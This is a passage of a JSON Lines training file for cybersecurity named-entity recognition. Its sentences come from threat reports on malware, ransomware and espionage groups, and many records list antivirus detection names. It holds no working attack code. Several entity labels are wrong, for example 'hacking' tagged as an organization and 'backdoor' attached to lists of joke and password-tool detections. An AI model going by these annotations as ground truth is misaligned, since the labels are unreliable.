not-a-virus:PSWTool.Win32.Ophcrack.a Application.PassView.BE Tool.PassSteel.1076 BehavesLike.Win32.Dropper.rc W32/Risk.YHKN-9333 
RiskWare[PSWTool]/Win32.PWDump.at Application.PassView.BE not-a-virus:PSWTool.Win32.Ophcrack.a Application.PassView.BE Trojan.PSWTool!8KQf3yAIaxc not-a-virus.PSWTool.ophCrack", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003812", "source": "cyner2_train"}} {"text": "The ransom note contains the following text:", "spans": {}, "info": {"id": "cyner2_train_003815", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Corrupt.PE Worm:Win32/Fanta@mm.dam#2 Worm.Win32.Fanta", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003816", "source": "cyner2_train"}} {"text": "Dridex is a banking trojan, which is a bot that communicates with a C&C server through HTTP.", "spans": {"MALWARE: Dridex": [[0, 6]], "MALWARE: banking trojan,": [[12, 27]], "MALWARE: bot": [[39, 42]]}, "info": {"id": "cyner2_train_003817", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Virut.G W32/Trojan2.MPL W32.Virut.CF W32/Virut.GE Virus.Win32.Virut.ce Win32.Virut.AM Trojan.Opclose TR/VB.EWS Worm.Win32.SillyFDC!IK Worm/Kolab.jfi Virus:Win32/Virut.BN Win32/Virut.F W32/Trojan2.MPL Virus.Virut.13 Win32.Virut.dz Worm.Win32.SillyFDC W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003820", "source": "cyner2_train"}} {"text": "After further investigation, we realized that its infrastructure for exfiltrating credentials was still operational and that Ebury was still being actively used by the Windigo gang.", "spans": {"SYSTEM: infrastructure": [[50, 64]], "MALWARE: Ebury": [[125, 130]], "THREAT_ACTOR: the Windigo gang.": [[164, 181]]}, "info": {"id": "cyner2_train_003821", "source": "cyner2_train"}} {"text": "The attackers compromised two legitimate Thai websites to host the malware, which is a tactic this group has used in the past.", "spans": {"THREAT_ACTOR: attackers": [[4, 13]], "MALWARE: malware,": [[67, 75]], "THREAT_ACTOR: group": [[99, 104]]}, "info": {"id": 
"cyner2_train_003822", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.SMSHoax Dropper.Dapato.Win32.20900 Win32.Trojan.WisdomEyes.16070401.9500.9953 TROJ_GE.CFDA1E9F Win.Trojan.Inject-14546 Trojan.Win32.InstallMonster.cxzobk Win.Troj.mzIo TrojWare.Win32.Injector.BCBA Trojan.InstallMonster.120 TROJ_GE.CFDA1E9F BehavesLike.Win32.Backdoor.rc Hoax.Win32.ArchSMS Trojan/Inject.awic TR/Rogue.11221316.14 Win32.Troj.Undef.kcloud Trojan.Injector!UXjGJT5Czj8 W32/Injector.BCBB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003823", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Small.AIA4 Trojan.Buzy.518 TROJ_DLOADR.SMUS Win32/Small.QR TROJ_DLOADR.SMUS Trojan.DownLoader6.35083 BehavesLike.Win32.RansomWannaCry.mz Trojan.Win32.Malex TrojanDownloader:Win32/Onitab.B Trojan/Win32.Downloader.R33065 Trj/CI.A Win32/TrojanDownloader.Small.PAL", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003824", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Scar.499712.C Trojan-Ransom.Win32.Blocker!O TrojanDropper.Dwonk.A Trojan/Chydo.cdh TROJ_RENOS.SM Win32.Worm.AutoRun.bj W32/Trojan2.JXKJ Win32/SillyAutorun.CCQ TROJ_RENOS.SM Trojan-Ransom.Win32.Blocker.ckeq Trojan.Win32.Drop.ihult Trojan.Win32.Chydo.1032192 TrojWare.Win32.Scar.AB Trojan.MulDrop.46689 Backdoor.Klon.Win32.955 BehavesLike.Win32.Backdoor.gc Trojan.Win32.Chydo W32/Trojan.GFJX-4360 Trojan/Scar.cym Trojan/Win32.Scar Trojan-Ransom.Win32.Blocker.ckeq TrojanDropper:Win32/Dwonk.A Trojan/Win32.Chydo.R3468 Trojan.Chudik.28205 Trojan-ransom.Win32.Blocker.ckeq Trojan.Chydo!nNe8FVSDJ+I Win32/Trojan.16c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003825", "source": "cyner2_train"}} {"text": "The second phase is when an attachment from the malspam retrieves ransomware from a web server.", "spans": {"MALWARE: ransomware": [[66, 76]], "SYSTEM: a web server.": [[82, 95]]}, "info": 
{"id": "cyner2_train_003827", "source": "cyner2_train"}} {"text": "These malicious installers were then uploaded to Baidu's cloud file sharing service for used by Chinese iOS/OS X developers.", "spans": {"MALWARE: malicious installers": [[6, 26]], "SYSTEM: Baidu's cloud file sharing service": [[49, 83]], "ORGANIZATION: Chinese iOS/OS X developers.": [[96, 124]]}, "info": {"id": "cyner2_train_003828", "source": "cyner2_train"}} {"text": "The technical details of the attack have yet to be made public, however we've recently identified tools uploaded to online malware repositories that we believe are linked to the heist.", "spans": {"MALWARE: tools": [[98, 103]], "MALWARE: online malware repositories": [[116, 143]], "THREAT_ACTOR: the heist.": [[174, 184]]}, "info": {"id": "cyner2_train_003833", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor/W32.Visel.41946 Backdoor.Visel.Win32.404 Backdoor.W32.Visel.asz!c Backdoor/Visel.asd Win32.Trojan.WisdomEyes.16070401.9500.9969 Backdoor.Trojan Trojan-GameThief.Win32.Magania.tqse Trojan.Win32.Visel.bqjxis BackDoor.Darkshell.270 BehavesLike.Win32.Downloader.ph Backdoor.Win32.Visel Backdoor/Visel.sw TR/Drop.Strigy.A.2 Trojan[Backdoor]/Win32.Visel TrojanDropper:Win32/Strigy.A Backdoor.Win32.A.Visel.39424 Trojan-GameThief.Win32.Magania.tqse Backdoor/Win32.CSon.R885 Win32.Trojan-gamethief.Magania.Pfju Trojan.DR.Strigy!SJEu21JfMbU W32/Visel.ASZ!tr.bdr Trj/ByShell.C Win32/Trojan.b7f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003834", "source": "cyner2_train"}} {"text": "In 2016, from September through November, an APT campaign known as menuPass targeted Japanese academics working in several areas of science, along with Japanese pharmaceutical and a US-based subsidiary of a Japanese manufacturing organizations.", "spans": {"THREAT_ACTOR: an APT campaign": [[42, 57]], "THREAT_ACTOR: menuPass": [[67, 75]], "ORGANIZATION: Japanese academics": [[85, 103]], "ORGANIZATION: Japanese 
pharmaceutical": [[152, 175]], "ORGANIZATION: US-based subsidiary of a Japanese manufacturing organizations.": [[182, 244]]}, "info": {"id": "cyner2_train_003836", "source": "cyner2_train"}} {"text": "Attacks originating from this threat group have not ceased since our previous report from April of 2017 and have continued through July of 2017.", "spans": {"ORGANIZATION: threat group": [[30, 42]]}, "info": {"id": "cyner2_train_003837", "source": "cyner2_train"}} {"text": "It searches the Android and Google Chrome browsers for stored sensitive information.", "spans": {"SYSTEM: Android": [[16, 23]], "SYSTEM: Google Chrome browsers": [[28, 50]]}, "info": {"id": "cyner2_train_003838", "source": "cyner2_train"}} {"text": "The malicious capabilities observed in the second stage include the following : Upload attacker-specified files to C2 servers Get list of installed applications Get device metadata Inspect itself to get a list of launchable activities Retrieves PDF , txt , doc , xls , xlsx , ppt , pptx files found on external storage Send SMS Retrieve text messages Track device location Handle limited attacker commands via out of band text messages Record surrounding audio Record calls Record video Retrieve account information such as email addresses Retrieve contacts Removes copies of itself if any additional APKs are downloaded to external storage .", "spans": {}, "info": {"id": "cyner2_train_003840", "source": "cyner2_train"}} {"text": "The functionality of Pro PoS seems fairly extensive according to recent press releases.", "spans": {"MALWARE: Pro PoS": [[21, 28]]}, "info": {"id": "cyner2_train_003848", "source": "cyner2_train"}} {"text": "The summer months dawn on us and the financial year comes to a close.", "spans": {}, "info": {"id": "cyner2_train_003850", "source": "cyner2_train"}} {"text": "Today, we are releasing the full whitepaper on the Potao malware with additional findings, the cyberespionage campaigns where it was employed, and its connection to a 
backdoor in the form of a modified version of the TrueCrypt encryption software.", "spans": {"MALWARE: Potao malware": [[51, 64]], "THREAT_ACTOR: cyberespionage campaigns": [[95, 119]], "MALWARE: backdoor": [[167, 175]], "MALWARE: the TrueCrypt encryption software.": [[213, 247]]}, "info": {"id": "cyner2_train_003851", "source": "cyner2_train"}} {"text": "Dropped by the Nuclear exploit kit, further investigation showed that the malware was a new Trojan called Thanatos by its developers and that we refer to internally as Alphabot", "spans": {"MALWARE: Nuclear exploit kit,": [[15, 35]], "MALWARE: malware": [[74, 81]], "MALWARE: Trojan": [[92, 98]], "MALWARE: Thanatos": [[106, 114]], "THREAT_ACTOR: developers": [[122, 132]], "THREAT_ACTOR: Alphabot": [[168, 176]]}, "info": {"id": "cyner2_train_003852", "source": "cyner2_train"}} {"text": "A newly patched zero-day vulnerability in Internet Explorer has already been exploited in attacks involving a compromised website belonging to an evangelical church in Hong Kong.", "spans": {"VULNERABILITY: zero-day vulnerability": [[16, 38]], "SYSTEM: Internet Explorer": [[42, 59]], "ORGANIZATION: evangelical church": [[146, 164]]}, "info": {"id": "cyner2_train_003854", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod748.Trojan.b154 Trojan.DR.Cutwail!zuYZ2Zvwu1k Trojan.Zlob PE:Trojan.Win32.DNSChanger.drb!1075148351 TrojWare.Win32.Trojan.DNSChanger.~CRSD Trojan.Packed.194 Win32.Troj.DNSChangerT.dx.14848 Trojan:Win32/Zlob.AS Trojan/Win32.Monder Virus.Win32.Heur.c Trojan.Inject Downloader.Tiny.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003855", "source": "cyner2_train"}} {"text": "Indeed, the past few months seem to be quite busy for the Andromeda botnet and its recent activity indicates intent in the United States.", "spans": {"MALWARE: Andromeda botnet": [[58, 74]]}, "info": {"id": "cyner2_train_003857", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
Trojan.Symmi.D13DDA Win.Trojan.Delf-6394424-2 Trojan-Downloader.Win32.Delf.krvg Trojan.Win32.Delf.evdbqw BehavesLike.Win32.BadFile.th Trojan-Downloader.Win32.Delf TR/Downloader.sfpmb Trojan-Downloader.Win32.Delf.krvg Trojan/Win32.Tiggre.C2290717 Trj/GdSda.A W32/Delf.CGH!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003858", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.BindEx.A3 Trojan.MSIL.BindEx.a Win32.Risk.Malware.Szbo Trojan.InstallCube.49 Trojan.Zusy.D3BCBB Trojan.MSIL.BindEx.a Trojan:MSIL/Torwofun.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003860", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Qhost.pml Win32/Jeefo.A Virus.Win32.Hidrag.a Win32.Jeefo.B Virus.Win32.Hidrag.clfcen Win32.Jeefo.B Win32.HLLP.Jeefo.36352 Trojan:Win32/Vb.At W32/Hidrag.E Virus/Win32.Hidrag.a Win32.Jeefo.B Virus.Win32.Hidrag.a Win32.Jeefo.B", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003861", "source": "cyner2_train"}} {"text": "The identification of cyber crime actors, particularly Nigerian 419 scam operators, attempting to exploit CVE-2014-4114 demonstrates how quickly cyber criminals are trying to exploit a vulnerability previously associated with espionage actors, using similar tactics, techniques, and procedures TTP to maximize their chances of success, with additional innovation as seen with these samples.", "spans": {"THREAT_ACTOR: cyber crime actors,": [[22, 41]], "THREAT_ACTOR: Nigerian 419 scam operators,": [[55, 83]], "VULNERABILITY: exploit": [[98, 105], [175, 182]], "THREAT_ACTOR: cyber criminals": [[145, 160]], "VULNERABILITY: vulnerability": [[185, 198]], "THREAT_ACTOR: espionage actors,": [[226, 243]]}, "info": {"id": "cyner2_train_003863", "source": "cyner2_train"}} {"text": "This assessment is supported by both previous X-Force research and open source reporting on ITG08, although X-Force lacks definitive data 
that verifies this was the initial access vector.", "spans": {"ORGANIZATION: research": [[54, 62]], "ORGANIZATION: open source reporting": [[67, 88]], "THREAT_ACTOR: ITG08,": [[92, 98]], "ORGANIZATION: X-Force": [[108, 115]], "THREAT_ACTOR: access vector.": [[173, 187]]}, "info": {"id": "cyner2_train_003864", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Winlogonxe.Trojan Trojan-PSW.Win32.Papras!O Trojan.Fsysna Win32.Trojan.WisdomEyes.16070401.9500.9984 Trojan.Win32.Fsysna.dikb Trojan.Win32.Papras.bsmtj Trojan.Win32.A.PSW-Papras.39982 Troj.PSW32.W.QQPass.l2mO Trojan.DownLoader.origin Trojan.OnLineGames.Win32.77881 BehavesLike.Win32.SpywareLyndra.nh Backdoor.Win32.DarkMoon Trojan/PSW.Papras.ut Trojan[PSW]/Win32.Papras Win32.PSWTroj.Papras.kcloud Trojan.Win32.Fsysna.dikb Backdoor:Win32/Votwup.B Trojan/Win32.Papras.R7955 Win32.Trojan.Fsysna.Edxa Win32/Trojan.b7e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003865", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Kazy.D26B7F Win32.Trojan.WisdomEyes.16070401.9500.9941 W32/Trojan.ITVV-3454 Trojan.MulDrop4.59905 BehavesLike.Win32.Trojan.fh Trojan:Win32/Yangxiay.A Win32/Trojan.6f6", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003866", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Skeeyah.5634 Trojan.Zusy.D38734 TROJ_FASTREK.SM Win32.Trojan.WisdomEyes.16070401.9500.9982 TROJ_FASTREK.SM Trojan.Win32.Dwn.dqtjmk Trojan.DownLoader12.58274 W32/Trojan.UUJD-8445 Worm:Win32/Pemtaka.A Win32/Trojan.562", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003868", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod9fb.Trojan.3b9b Joke.MoveDesktop W32/MoveDesktop.A TROJ_SPNR.04CJ11 Joke.Slidescreen.4 JOKE/MoveDesktop.A TROJ_SPNR.04CJ11 Win32.Troj.Hoax.kcloud Joke:Win32/Crazyscr.A Joke.Win32.Metro Trj/CI.A Win32/Joke.SlideScreen Joke.Win32.ShakeScreen.b Virus.Win32.BHO 
Joke.BR Trojan.Win32.BadJoke.Ar", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003871", "source": "cyner2_train"}} {"text": "On October 26, 2015, Cyphort Labs discovered that psychcentral[.]com has been compromised and is currently infecting visitors via drive-by-download malwares.", "spans": {"ORGANIZATION: Cyphort Labs": [[21, 33]], "MALWARE: drive-by-download malwares.": [[130, 157]]}, "info": {"id": "cyner2_train_003872", "source": "cyner2_train"}} {"text": "A previously unknown group called Strider has been conducting cyberespionage-style attacks against selected targets in Russia, China, Sweden, and Belgium.", "spans": {"THREAT_ACTOR: unknown group": [[13, 26]], "THREAT_ACTOR: Strider": [[34, 41]]}, "info": {"id": "cyner2_train_003876", "source": "cyner2_train"}} {"text": "Terracotta's network of 1500+ VPN nodes throughout the world are primarily obtained by hacking into inadequately protected Windows servers in legitimate organizations, without the victim's knowledge or permission.", "spans": {"THREAT_ACTOR: Terracotta's network": [[0, 20]], "SYSTEM: VPN nodes": [[30, 39]], "ORGANIZATION: hacking": [[87, 94]], "SYSTEM: Windows servers": [[123, 138]]}, "info": {"id": "cyner2_train_003878", "source": "cyner2_train"}} {"text": "Multiple owners of Github repositories received phishing emails.", "spans": {"ORGANIZATION: owners": [[9, 15]], "SYSTEM: Github repositories": [[19, 38]]}, "info": {"id": "cyner2_train_003882", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Kryptik.UMVM-2214 TrojWare.MSIL.Kryptik.ACD Trojan.KillProc.49202 BehavesLike.Win32.Trojan.fh W32/Kryptik.PD Trojan.Zusy.D33DFF Trojan/Win32.Dynamer.C2272217 Trojan.ScreenLocker Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003886", "source": "cyner2_train"}} {"text": "A few days ago I got a message on Facebook from a person I very rarely speak to, and I knew that something 
fishy was going on.", "spans": {"ORGANIZATION: Facebook": [[34, 42]]}, "info": {"id": "cyner2_train_003888", "source": "cyner2_train"}} {"text": "We found two vulnerabilities that were now being targeted by exploit kits, with one being the recent Pawn Storm Flash zero-day.", "spans": {"VULNERABILITY: two vulnerabilities": [[9, 28]], "MALWARE: exploit kits,": [[61, 74]], "THREAT_ACTOR: Pawn Storm": [[101, 111]], "VULNERABILITY: Flash zero-day.": [[112, 127]]}, "info": {"id": "cyner2_train_003889", "source": "cyner2_train"}} {"text": "Continuing with the never ending series of malware email attachments is an email with the subject of payment slip coming or pretending to come from random companies, names and email addresses with an ACE attachment ACE files are a sort of zip file that normally needs special software to extract.", "spans": {"MALWARE: malware": [[43, 50]]}, "info": {"id": "cyner2_train_003893", "source": "cyner2_train"}} {"text": "A backdoor also known as: W97m.Downloader.GBT W97M.Downloader.BHA W97M.Downloader W2KM_POWLOAD.AUSJQU W97m.Downloader.GBT W97m.Downloader.GBT Trojan.Ole2.Vbs-heuristic.druvzi W97m.Downloader.GBT W97m.Downloader.GBT W2KM_POWLOAD.AUSJQU HEUR.VBA.Trojan.e virus.office.qexvmc.1095", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003894", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.HfsAutoB.E388 Trojan.Zusy.D3675 Backdoor.Trojan Win32/Talwadig.A Spammer:Win32/Talwadig.A W32/Talwadig.SPM!tr Win32/Trojan.49c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003895", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Spy.Burda.vq W32/Trojan2.LHHI Trojan-Spy.Win32.Burda.bun TrojWare.Win32.Spy.Burda.A Trojan.Packed.1027 TROJ_BURDA.SM Win32/SinoMBR.A W32/Trojan2.LHHI Virus.Win32.SinoMBR!IK Trojan:Win32/Riggin.B Trojan-Spy.Win32.Burda.r Virus.Win32.SinoMBR Downloader.Small.61.BV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_003896", "source": "cyner2_train"}} {"text": "The recent vulnerability of MS15-093 revealed that attackers were using it distribute the Korplug/Plugx RAT.", "spans": {"VULNERABILITY: vulnerability": [[11, 24]], "VULNERABILITY: MS15-093": [[28, 36]], "MALWARE: RAT.": [[104, 108]]}, "info": {"id": "cyner2_train_003897", "source": "cyner2_train"}} {"text": "The brazen attack used chained 0-days against Adobe Flash and Microsoft Internet Explorer 9 to attempt to gain access to internal networks at these companies.", "spans": {"VULNERABILITY: brazen attack": [[4, 17]], "VULNERABILITY: chained 0-days": [[23, 37]], "SYSTEM: Adobe Flash": [[46, 57]], "SYSTEM: Microsoft Internet Explorer 9": [[62, 91]]}, "info": {"id": "cyner2_train_003901", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.MSIL.1 Win32.Trojan.WisdomEyes.16070401.9500.9592 Ransom_HEROPOINT.A Trojan.Win32.Ransom.ewrnqz Trojan.Win32.S.Ransom.29184.B Ransom_HEROPOINT.A Trojan-Ransom.Heropoint Trojan.MSIL.ieap TR/Ransom.gohtu Ransom:MSIL/Crypute.C Trojan.Ransom.Filecoder Trj/GdSda.A Win32/Trojan.Ransom.935", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003903", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Kryptik.myh Win32.Trojan.WisdomEyes.16070401.9500.9688 Trojan.Win32.Click1.cpofr Trojan.Click1.34698 TR/Taranis.3998 Win32.TrojDownloader.Unknown.kcloud TrojanDownloader:Win32/Mimho.A Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003906", "source": "cyner2_train"}} {"text": "The worst affected were companies in the smelting, electric power generation and transmission, construction, and engineering industries.", "spans": {"ORGANIZATION: companies": [[24, 33]], "ORGANIZATION: the smelting, electric power generation": [[37, 76]], "ORGANIZATION: transmission, construction,": [[81, 108]], "ORGANIZATION: engineering industries.": [[113, 136]]}, "info": {"id": "cyner2_train_003908", 
"source": "cyner2_train"}} {"text": "Spread via hacked Aeria games offered on unofficial websites, the modular malware can download and install virtually any other malicious code on the victim's computer.", "spans": {"SYSTEM: Aeria games": [[18, 29]], "MALWARE: malware": [[74, 81]], "MALWARE: malicious code": [[127, 141]], "SYSTEM: the victim's computer.": [[145, 167]]}, "info": {"id": "cyner2_train_003910", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Emotet.MUE.A5 Backdoor.PePatch.Win32.40158 Trojan/Urelas.u Win32.Trojan.Urelas.a Backdoor.Graybird TROJ_URELAS.SMC Win.Trojan.Urelas-212 Trojan.Win32.demmsd.eaqemx Ransom.Win32.CryLock.a Trojan.AVKill.33464 TROJ_URELAS.SMC BehavesLike.Win32.Gupboot.hc Trojan.Win32.Toga Backdoor/Plite.ah Trojan.Zusy.D1C63F Trojan/Win32.Urelas.R92523 BScope.Backdoor.Gulf Trojan.Urelas.U Trojan.Urelas!2wQyqHhm58c W32/Urelas.AB!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003912", "source": "cyner2_train"}} {"text": "The analysis starts with a Microsoft Word document named 2017 Q4 Work Plan.docx with a hash of 292843976600e8ad2130224d70356bfc, which was created on 2017-10-11 by a user called Admin'', and first uploaded to VirusTotal, a website and file scanning service, on the same day, by a user in South Africa.", "spans": {"ORGANIZATION: VirusTotal,": [[209, 220]], "ORGANIZATION: user": [[280, 284]]}, "info": {"id": "cyner2_train_003913", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Estiwir.S21079 Trojan.Win32.Estiwir Trojan:Win32/Estiwir.A Trj/CI.A Win32/Trojan.87b", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003914", "source": "cyner2_train"}} {"text": "We also learned that an Android malware known as GhostCtrl was stored in their infrastructure, which might be used for cyberespionage or cybercrime.", "spans": {"MALWARE: an Android malware": [[21, 39]], "MALWARE: GhostCtrl": [[49, 58]], "SYSTEM: infrastructure,": [[79, 94]], 
"THREAT_ACTOR: cyberespionage": [[119, 133]], "THREAT_ACTOR: cybercrime.": [[137, 148]]}, "info": {"id": "cyner2_train_003915", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.OnGameExQSJKAH.Trojan Backdoor.Pahador.Win32.1 Backdoor/Pahador.t BKDR_PAHADOR.AB Win32.Trojan.WisdomEyes.16070401.9500.9967 W32/Backdoor.QCR Win32/Spybot.AEZ BKDR_PAHADOR.AB Win.Trojan.Delf-939 Trojan.Win32.Fsysna.dhnu Trojan.Win32.Pahador.dkwu Backdoor.Win32.Pahador.801128 Troj.W32.Fsysna!c Backdoor.Win32.Pahador.T Program.Vskeylogger Backdoor.Win32.Pahador W32/Backdoor.PLOG-4776 Backdoor/Pahador.ai Trojan[Backdoor]/Win32.Pahador Win32.Hack.Pahador.t.kcloud Backdoor.Pahador Trojan.Win32.Fsysna.dhnu Trojan/Win32.Pahador.R2394 TScope.Trojan.Delf Win32/Pahador.T Win32.Trojan.Fsysna.Dyzz Backdoor.Pahador!aVEw4P0RDQo W32/Sfmybd.C3E3!tr Win32/Trojan.05c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003916", "source": "cyner2_train"}} {"text": "However, getting 83 pieces in one shot is way too generous by any account and it surely peaked the interest of our researchers.", "spans": {}, "info": {"id": "cyner2_train_003918", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Adware.TOVus.Win32.1 HT_TOVKATER_GC31024C.UVPM Win32.Trojan.WisdomEyes.16070401.9500.9998 HT_TOVKATER_GC31024C.UVPM AdWare.TOVus Trojan.Win32.Tovkater.emvdzi Trojan.InstallMonster.2420 Pua.Downloadmanager TrojanDownloader:Win32/Katerav.A!bit Trojan.Zusy.D37F51 PUP.Optional.BundleInstaller Win32/TrojanDownloader.Tovkater.D Trojan-Downloader.Win32.Tovkater W32/Tovkater.F!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003920", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Bindo.worm W32/Malas.LPWD-1696 W32.Linkfars Win.Worm.AutoRun-1 P2P-Worm.Win32.Malas.r Heur.Corrupt.PE P2P-Worm:W32/Malas.A W32/Bindo.worm W32/Malas.A WORM/Khanani.A Worm:Win32/Malas.A P2P-Worm.Win32.Malas.r W32/Nahkos.D.worm 
P2P-Worm.Win32.Malas W32/Malas.R!worm", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003924", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL Trojan.MSILPerseus.DE1E5 Trojan.MSIL.Fakesupport W32/Trojan.VUDL-1796 Trojan.MSIL.idlr W32.Bsodscam.Locker SupportScam:MSIL/TechscamBSOD.A PUP/Win32.FakeBSOD.R192454 Trojan.TechSupportScam", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003928", "source": "cyner2_train"}} {"text": "The operation seems to originate from Saudi Arabia mostly; seeing its C2 IP is a home IP address and njRat does not support proxying C2 communciations over infectees.", "spans": {"THREAT_ACTOR: operation": [[4, 13]], "MALWARE: njRat": [[101, 106]]}, "info": {"id": "cyner2_train_003930", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9802 Trojan.Win32.VkHost.aeys Trojan.Win32.Delf.wgpjk Troj.W32.Vkhost!c Win32.Trojan.Vkhost.Wtxk Trojan.PWS.Spy.14811 BehavesLike.Win32.BadFile.fh W32/Trojan.HSNN-1750 Trojanspy:Win32/Fitmu.A BDS/Delf.aegx W32/VkHost.AEYS!tr Trojan[Backdoor]/Win32.Delf Trojan.Graftor.D754C Trojan.Win32.Z.Graftor.401229 Trojan.Win32.VkHost.aeys Trojan:Win32/Kuta.A Trojan/Win32.Delf.C161449 Backdoor.Delf Win32/Bicololo.D Backdoor.Win32.Delf", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003931", "source": "cyner2_train"}} {"text": "We first learned of Locky through Invincea and expanded on qualifying this threat with the help of PhishMe. 
Locky has also gained enough traction to find its way onto Dynamoo's Blog and Reddit.", "spans": {"MALWARE: Locky": [[20, 25], [108, 113]], "MALWARE: threat": [[75, 81]], "ORGANIZATION: PhishMe.": [[99, 107]], "ORGANIZATION: Dynamoo's Blog": [[167, 181]], "ORGANIZATION: Reddit.": [[186, 193]]}, "info": {"id": "cyner2_train_003932", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9638 Trojan.Dropper Win32/SillyDl.XVX Win.Trojan.Msupdater-1 Trojan-Ransom.Win32.Blocker.cfzl Trojan.Win32.Inject.cmocx Trojan.MulDrop3.62588 Trojan.Blocker.Win32.31495 BehavesLike.Win32.Backdoor.cc Trojan[Ransom]/Win32.Blocker Trojan-Ransom.Win32.Blocker.cfzl Trojan:Win32/Ovoxual.B Trojan.Che.xc Win32.Trojan.Blocker.Stua Trojan.Blocker!XrooD1Mdx9Q Win32/Trojan.Dropper.cd7", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003933", "source": "cyner2_train"}} {"text": "A backdoor also known as: Heur.Corrupt.PE HackTool[DoS]/Win32.Fedup DoS:Win32/Fedup.2_0.dam Hoax.Win32.BadJoke.FakeDel", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003934", "source": "cyner2_train"}} {"text": "A backdoor also known as: Vbs.Trojan.Qhost.Lpbo Trojan/Bicololo.a Win32.Trojan.WisdomEyes.16070401.9500.9869 Trojan.VBS.Qhost.gc Trojan.Script.Qhost.dbtszl TrojWare.Win32.Bicololo.DI Trojan.Hosts.6838 W32.Trojan.Bat.Qhost Trojan:BAT/Qhost.AF Trojan.SMHeist.1 Trojan.VBS.Qhost.gc Trojan/Win32.Bicololo.R82150 Win32/Bicololo.A Trojan.BAT.Qhost W32/Bicololo.A!tr Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_003936", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Plutor!O Worm.Plutor W32/Lutor.b Virus.W32.Plutor!c PE_PLUTOR.A Win32.Trojan.WisdomEyes.16070401.9500.9838 W32.Lutor PE_PLUTOR.A Win.Trojan.Win-25 Virus.Win32.Plutor.b Trojan.Win32.Plutor.cxgc BackDoor.Jeff Virus.Plutor.Win32.2 BehavesLike.Win32.Virus.bh Trojan-Dropper.Win32.Joiner 
